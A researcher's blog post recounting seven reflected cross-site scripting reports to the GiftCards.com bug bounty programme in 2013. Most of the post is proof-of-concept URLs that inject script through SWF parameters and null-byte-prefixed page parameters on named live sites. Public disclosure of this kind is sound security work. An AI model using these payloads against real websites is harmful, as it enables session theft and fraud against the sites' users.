Skip to content

My experiences with the GiftCards.com Bug Bounty Program

Posted by Stefan Schurtz on
Since November 2013 I reported seven Cross-site Scripting vulnerabilities to the Giftcard Bug Bounty Program. Sadly, only one of them wasn’t a duplicate :-/. Strange? Perhaps, but not impossible given the simplicity of the vulnerabilities.
 
But, what I really don’t understand: Why do they still work until today?
 
 
11/17/2013 Vulnerability #1: (DUP)
 
// Reflected Cross-site Scripting
 
http://www.giftcardgirlfriend.com/wp-content/plugins/audio-player/assets/player.swf?playerID=a\"))}catch(e){alert(document.domain)}//

// Original advisory
 
 
11/17/2013 Vulnerability #2: - OK – Reward or not ;-)
 
// Reflected Cross-site Scripting (tested with FF 25.0.1)
 
http://www.giftcardgirlfriend.com/wp-includes/js/swfupload/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(document.domain);//

// Original Advisory
 
 
11/21/2013 Vulnerability #3: (DUP)
 
// Reflected Cross-site Scripting with SWF-Files (tested on Firefox 25.0.1)
 
http://www.giftcards.com/swf/elf.swf?va_link=javascript:alert(document.domain);
http://www.giftcards.com/swf/santa-sample.swf?va_link=javascript:alert(document.domain);

 
 
11/26/2013 Vulnerability #4: (DUP)
 
// Reflected Cross-site Scripting with IE10
 
https://www.giftcards.com/order-status?%00"><script>alert(document.domain)</script>
 
 
12/05/2013 Vulnerability #5:
 
// Reflected Cross-site Scripting with IE10
 
https://www.giftcards.com/signup?%00"><script>alert(document.domain)</script>
 
 
 
12/05/2013 Vulnerability #6:
 
// Reflected Cross-site Scripting with IE10
 
https://www.giftcards.com/member?%00"><script>alert(document.domain)</script>
 
 
12/05/2013 Vulnerability #7:
 
// Reflected Cross-site Scripting with IE10
 
http://www.giftcards.com/group-gifts/create/new?%00"><script>alert(document.domain)</script>
 
 

Trackbacks

No Trackbacks

Comments

Display comments as Linear | Threaded

No comments

Add Comment


To prevent automated Bots from commentspamming, please enter the string you see in the image below in the appropriate input box. Your comment will only be submitted if the strings match. Please ensure that your browser supports and accepts cookies, or your comment cannot be verified correctly.
CAPTCHA 1CAPTCHA 2CAPTCHA 3CAPTCHA 4CAPTCHA 5


Textile-formatting allowed
You can use [geshi lang=lang_name [,ln={y|n}]][/geshi] tags to embed source code snippets.
Form options

Submitted comments will be subject to moderation before being displayed.

Imprint | Contact | Privacy Statement